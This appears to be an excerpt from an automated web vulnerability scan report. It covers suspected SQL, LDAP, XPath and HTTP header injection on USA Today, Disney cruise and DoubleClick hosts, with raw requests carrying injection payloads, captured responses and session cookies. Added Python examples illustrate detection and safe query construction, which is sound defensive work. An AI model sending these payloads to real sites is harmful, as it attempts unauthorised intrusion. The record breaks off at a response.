Now is a great time to <a href=\"#\">fill in your profile<\/a>.<\/span><\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-private-info\">This profile is private.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-sharedWithFriends-info\">This profile is only shared with friends.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-abusive-info\">This profile is under review.<\/p>\r\n\t\t\t\t<p class=\"pluck-error-message pluck-user-mp-error-detail\" style=
...[SNIP]...

Request 2

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app20459079'%20or%201%3d2--%20&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response 2

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89540
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:07 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_user_miniPersona_dialog_26019\" class=\"pluck-user-mp-dialog\" >\r\n\t<div class=\"pluck-user-mp-qtip-style\" style=\"display:none;\"><\/div>\r\n\t<div class=\"pluck-user-mp-wrap\">\r\n\t\t<div class=\"pluck-user-mp-sidebar\">\r\n\t\t\t<div class=\"pluck-user-mp-avatar-seethrough\">\r\n\t\t\t\t<a href=\"#\"><img alt=\"\" class=\"pluck-user-mp-avatarimg\" \/><\/a>\r\n\t\t\t<\/div>\r\n\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-wait\">\r\n\t\t\t<div class=\"pluck-user-mp-wait-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-wait-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we process your request<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-loading\">\r\n\t\t\t<div class=\"pluck-user-mp-loading-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-loading-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we retrieve the user\'s information<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-content\">\r\n\t\t\t<h4 class=\"pluck-user-mp-username\"><a href=\"#\"><span class=\"pluck-user-mp-username-value\"><\/span><\/a><\/h4>\r\n\t\t\t<p class=\"pluck-user-mp-asl\"><\/p>\r\n\t\t\t<div class=\"pluck-user-mp-activity-area\">\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-sub-head\">Bio<\/span><span class=\"pluck-user-mp-text pluck-user-mp-bio\"><\/span><\/p>\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-no-bio\">Your bio is currently empty. 
Now is a great time to <a href=\"#\">fill in your profile<\/a>.<\/span><\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-private-info\">This profile is private.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-sharedWithFriends-info\">This profile is only shared with friends.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-abusive-info\">This profile is under review.<\/p>\r\n\t\t\t\t<p class=\"pluck-error-message pluck-user-mp-error-detail\" style=
...[SNIP]...
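The difference-based test behind 1.5, 1.7 and 1.9 compares a "true" payload (`' or 1=1-- `) with a "false" one (`' or 1=2-- `) and reports when the responses differ. The Python below is an added example, not code from this report or from any of the scanned sites: it shows the difference a truly concatenated query produces against an in-memory SQLite table (constructed; the real backing stores are unknown), the absence of that difference once the query is parameterised, and a verdict function that repeats each payload and strips per-request tokens before calling a difference real. The two volatile-token patterns are the ones visible in the 1.5 and 1.9 responses above; the sample response bodies are constructed.

```python
import re
import sqlite3
from typing import Dict, List

# Payloads as the report submitted them in mboxSession (1.5) and widget_path (1.9), URL-decoded.
TRUE_PAYLOAD = "1305509219944-47884618153420' or 1=1-- "
FALSE_PAYLOAD = "1305509219944-47884618153420' or 1=2-- "


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an unknown session store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (id TEXT PRIMARY KEY, offer TEXT)")
    db.executemany(
        "INSERT INTO sessions VALUES (?, ?)",
        [("1305509219944-478846", "offer-A"), ("1305509219944-478847", "offer-B")],
    )
    return db


def vulnerable_lookup(db: sqlite3.Connection, session_id: str) -> List[str]:
    """String-built query: the pattern the report suspects. Deliberately unsafe."""
    sql = f"SELECT offer FROM sessions WHERE id = '{session_id}'"
    return sorted(row[0] for row in db.execute(sql))


def safe_lookup(db: sqlite3.Connection, session_id: str) -> List[str]:
    """Parameterised query: the quote and the 'or 1=1' stay inside the bound value."""
    sql = "SELECT offer FROM sessions WHERE id = ?"
    return sorted(row[0] for row in db.execute(sql, (session_id,)))


def render(offers: List[str], request_no: int) -> str:
    """Constructed response body with a per-request token, like forceId() in 1.5."""
    return f'offers={",".join(offers)};forceId("{request_no}.17")'


# Tokens seen to change between otherwise identical responses in the report.
VOLATILE = [
    re.compile(r'forceId\("[^"]*"\)'),                 # Test & Target PC id (1.5)
    re.compile(r"pluck_user_miniPersona_dialog_\d+"),  # Pluck widget id (1.9)
]


def normalize(body: str) -> str:
    for pattern in VOLATILE:
        body = pattern.sub("<volatile>", body)
    return body


def differential_verdict(true_samples: List[str], false_samples: List[str]) -> str:
    """Repeat each payload; only a stable difference is evidence of injection."""
    true_set = {normalize(b) for b in true_samples}
    false_set = {normalize(b) for b in false_samples}
    if len(true_set) != 1 or len(false_set) != 1:
        return "noise"  # the same request gives different bodies on its own
    return "consistent" if true_set != false_set else "no_difference"


def run_demo() -> Dict[str, str]:
    db = make_db()
    results = {}
    for name, lookup in (("vulnerable", vulnerable_lookup), ("safe", safe_lookup)):
        true_bodies = [render(lookup(db, TRUE_PAYLOAD), n) for n in (1, 2, 3)]
        false_bodies = [render(lookup(db, FALSE_PAYLOAD), n) for n in (4, 5, 6)]
        results[name] = differential_verdict(true_bodies, false_bodies)
    # Constructed stand-in for 1.9: bodies that differ only in the dialog id.
    results["dialog_id_only"] = differential_verdict(
        ['plcb0(\'<div id="pluck_user_miniPersona_dialog_38586">\')'],
        ['plcb0(\'<div id="pluck_user_miniPersona_dialog_26019">\')'],
    )
    # Constructed stand-in for an ad server rotating creatives between requests.
    results["rotating_creative"] = differential_verdict(
        ["creative=A", "creative=B"], ["creative=A", "creative=C"]
    )
    return results


if __name__ == "__main__":
    print(run_demo())
```

Against the concatenated query the true payload returns every row and the false one returns none, and that difference is identical across repeats; the parameterised query returns nothing for either, and the 1.9-style bodies collapse to the same string once the dialog id is masked. A responder that changes on its own between repeats (the rotating creative case) is reported as noise rather than as a finding.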

2. LDAP injection
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
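The two probes used in the instances below are `*)(sn=*`, which closes the current assertion and appends a well-formed `(sn=*)`, and `*)!(sn=*`, which leaves a bare `!` where a filter parser expects `)`. A backend that interpolates the value answers the first with a broader search and the second with a parse error, which is the difference the scanner looks for. The Python below is an added example, not code from this report or from the scanned site: the filter shape `(&(objectClass=person)(uid=...))` is an assumption, the parser is a minimal RFC 4515 reader written for the example, and the escaping table is the RFC 4515 one.

```python
import re
from typing import Callable

# RFC 4515 escapes for a value placed inside a search filter.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# The two probe payloads from the instances below.
PROBE_VALID = "*)(sn=*"      # closes the uid assertion, appends a (sn=*) assertion
PROBE_INVALID = "*)!(sn=*"   # leaves a bare '!' where the parser expects ')'


def escape_filter_value(value: str) -> str:
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def vulnerable_filter(uid: str) -> str:
    """Direct interpolation: user data can close and add assertions."""
    return f"(&(objectClass=person)(uid={uid}))"


def safe_filter(uid: str) -> str:
    """Same filter with the value escaped, so metacharacters stay inside the value."""
    return f"(&(objectClass=person)(uid={escape_filter_value(uid)}))"


def allowlisted(uid: str) -> bool:
    """The remediation above: short alphanumeric strings only."""
    return re.fullmatch(r"[A-Za-z0-9]{1,32}", uid) is not None


def parse_filter(text: str):
    """Minimal RFC 4515 parser: nested tuples for &, |, ! and (attr=value) items."""
    pos = 0

    def expect(ch: str) -> None:
        nonlocal pos
        if pos >= len(text) or text[pos] != ch:
            raise ValueError(f"expected {ch!r} at offset {pos}")
        pos += 1

    def node():
        nonlocal pos
        expect("(")
        if pos < len(text) and text[pos] in "&|":
            op = text[pos]
            pos += 1
            children = []
            while pos < len(text) and text[pos] == "(":
                children.append(node())
            expect(")")
            return (op, children)
        if pos < len(text) and text[pos] == "!":
            pos += 1
            child = node()
            expect(")")
            return ("!", [child])
        end = text.find(")", pos)
        if end == -1:
            raise ValueError("unterminated item")
        attr, sep, value = text[pos:end].partition("=")
        if not sep or not attr:
            raise ValueError(f"bad item {text[pos:end]!r}")
        pos = end + 1
        return ("=", attr, value)

    tree = node()
    if pos != len(text):
        raise ValueError(f"trailing data at offset {pos}")
    return tree


def assertion_count(tree) -> int:
    return 1 if tree[0] == "=" else sum(assertion_count(c) for c in tree[1])


def probe_outcome(build: Callable[[str], str], uid: str) -> str:
    """What a backend that parses the built filter would do with this input."""
    try:
        return f"ok:{assertion_count(parse_filter(build(uid)))}"
    except ValueError:
        return "error"


if __name__ == "__main__":
    for build in (vulnerable_filter, safe_filter):
        for probe in (PROBE_VALID, PROBE_INVALID):
            print(build.__name__, repr(probe), build(probe), probe_outcome(build, probe))
```

With interpolation the valid probe yields three assertions (the attacker's `(sn=*)` now ANDed into the search) and the invalid probe fails to parse; with escaping both probes stay a single literal value and the filter keeps its two assertions, so the two responses no longer differ. The allowlist check rejects both probes outright, which is the cheaper defence where the value only ever needs to be an identifier.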


2.1. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/css

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner. Both responses below are HTTP 404 pages from the same Apache-Coyote (Tomcat) front end; they differ in size (102652 versus 33408 bytes) and in which template is rendered (the full site chrome versus a login form). A servlet container routing a path segment that contains ( ) ! and * can produce different error pages for the two strings without any directory lookup, so treat this as unconfirmed until a directory-backed function (a login or user lookup) is shown to react to the payloads.

Request 1

GET /*)(sn=*/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:36 GMT
Content-Length: 102652
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /*)!(sn=*/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:36 GMT
Content-Length: 33408
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

2.2. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:50 GMT
Content-Length: 102660
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /*)!(sn=*/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:50 GMT
Content-Length: 33416
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

3. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://travel.usatoday.com
Path:   /cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /cruises/post'/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1 HTTP/1.1
Host: travel.usatoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:20:15 GMT
Content-Length: 3080

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

4. HTTP header injection
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/tmg.telegraph.sponsored/sponsored.travel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 678b5%0d%0a8384566a10f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /678b5%0d%0a8384566a10f/tmg.telegraph.sponsored/sponsored.travel;at=header;pos=1;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305509216094? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

